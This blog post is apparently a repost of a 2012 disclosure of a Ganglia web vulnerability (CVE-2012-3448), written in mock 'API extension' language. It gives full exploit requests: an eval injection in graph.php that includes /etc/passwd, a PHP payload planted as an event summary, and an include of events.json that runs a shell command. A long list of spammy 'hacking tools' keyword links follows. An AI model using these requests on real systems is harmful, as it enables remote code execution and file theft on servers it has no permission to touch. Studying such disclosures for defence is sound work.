Friday, August 28, 2020

Extending Your Ganglia Install With The Remote Code Execution API

Previously I had gone over a somewhat limited local file include in the Ganglia monitoring application (http://ganglia.info). The previous article can be found here -
http://console-cowboys.blogspot.com/2012/01/ganglia-monitoring-system-lfi.html

I recently grabbed the latest version of the Ganglia web application to take a look to see if this issue has been fixed and I was pleasantly surprised... github is over here -
https://github.com/ganglia/ganglia-web
Looking at the code the following (abbreviated "graph.php") sequence can be found -

$graph = isset($_GET["g"])  ?  sanitize ( $_GET["g"] )   : "metric";
....
$graph_arguments = NULL;
$pos = strpos($graph, ",");
$graph_arguments = substr($graph, $pos + 1);
....
eval('$graph_function($rrdtool_graph,' . $graph_arguments . ');');


I can only guess that this previous snippet of code was meant to be used as some sort of API put in place for remote developers, unfortunately it is slightly broken. For some reason when this API was being developed part of its interface was wrapped in the following function -

function sanitize ( $string ) {
  return  escapeshellcmd( clean_string( rawurldecode( $string ) ) ) ;
}


According the the PHP documentation -
Following characters are preceded by a backslash: #&;`|*?~<>^()[]{}$\, \x0A and \xFF. ' and " are escaped only if they are not paired. In Windows, all these characters plus % are replaced by a space instead.


This limitation of the API means we cannot simply pass in a function like eval, exec, system, or use backticks to create our Ganglia extension. Our only option is to use PHP functions that do not require "(" or ")" a quick look at the available options (http://www.php.net/manual/en/reserved.keywords.php) it looks like "include" would work nicely. An example API request that would help with administrative reporting follows:
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/etc/passwd'

Very helpful, we can get a nice report with a list of current system users. Reporting like this is a nice feature but what we really would like to do is create a new extension that allows us to execute system commands on the Ganglia system. After a brief examination of the application it was found that we can leverage some other functionality of the application to finalize our Ganglia extension. The "events" page allows for a Ganglia user to configure events in the system, I am not exactly sure what type of events you would configure, but I hope that I am invited.
As you can see in the screen shot I have marked the "Event Summary" with "php here". When creating our API extension event we will fill in this event with the command we wish to run, see the following example request -
http://192.168.18.157/gang/api/events.php?action=add&summary=<%3fphp+echo+`whoami`%3b+%3f>&start_time=07/01/2012%2000:00%20&end_time=07/02/2012%2000:00%20&host_regex=

This request will set up an "event" that will let everyone know who you are, that would be the friendly thing to do when attending an event. We can now go ahead and wire up our API call to attend our newly created event. Since we know that Ganglia keeps track of all planned events in the following location "/var/lib/ganglia/conf/events.json" lets go ahead and include this file in our API call - 
http://192.168.18.157/gang/graph.php?g=cpu_report,include+'/var/lib/ganglia/conf/events.json'


As you can see we have successfully made our API call and let everyone know at the "event" that our name is "www-data". From here I will leave the rest of the API development up to you. I hope this article will get you started on your Ganglia API development and you are able to implement whatever functionality your environment requires. Thanks for following along.

Update: This issue has been assigned CVE-2012-3448

Read more


  1. Pentest Tools
  2. Pentest Tools Port Scanner
  3. Install Pentest Tools Ubuntu
  4. Termux Hacking Tools 2019
  5. Hacker Tools For Mac
  6. Hacking Tools Mac
  7. How To Hack
  8. Hacking Tools For Mac
  9. Pentest Recon Tools
  10. Hacker Tools Online
  11. Free Pentest Tools For Windows
  12. Hack Website Online Tool
  13. Hacker Tool Kit
  14. Pentest Tools List
  15. Hacking Tools Free Download
  16. Hacking Tools Kit
  17. Pentest Tools
  18. Computer Hacker
  19. Hacker Tools Software
  20. Hacker Tools For Pc
  21. Termux Hacking Tools 2019
  22. Hacking Tools For Windows
  23. Pentest Tools Review
  24. How To Make Hacking Tools
  25. Hacking Tools Pc
  26. What Is Hacking Tools
  27. Pentest Tools Website
  28. Hack Tools
  29. Hack Tool Apk No Root
  30. Hacker Tools Online
  31. Hacking Tools Online
  32. Pentest Tools Alternative
  33. Hack Tools For Pc
  34. Hacking Tools Online
  35. Hack Tools Github
  36. Install Pentest Tools Ubuntu
  37. Hacker Tools Apk Download
  38. Pentest Tools
  39. Tools Used For Hacking
  40. Pentest Tools
  41. Pentest Tools Website
  42. Pentest Tools Linux
  43. Pentest Tools Find Subdomains
  44. Pentest Tools Url Fuzzer
  45. Pentest Tools Port Scanner
  46. Pentest Tools Kali Linux
  47. Hack Tools
  48. Hack And Tools
  49. Hacking Tools For Windows 7
  50. Pentest Tools For Mac
  51. Hacking Tools Kit
  52. Pentest Tools Find Subdomains
  53. Hacker Tools Windows
  54. Hacking Tools For Kali Linux
  55. Hacker Tools Github
  56. Hacking Tools 2019
  57. Hacker Tools For Ios
  58. Hacking Tools 2019
  59. How To Make Hacking Tools
  60. Pentest Tools Framework
  61. Pentest Tools For Mac
  62. Black Hat Hacker Tools
  63. Hack Tools
  64. Hacker Tools Linux
  65. Black Hat Hacker Tools
  66. Hack Tools
  67. Hack Website Online Tool
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)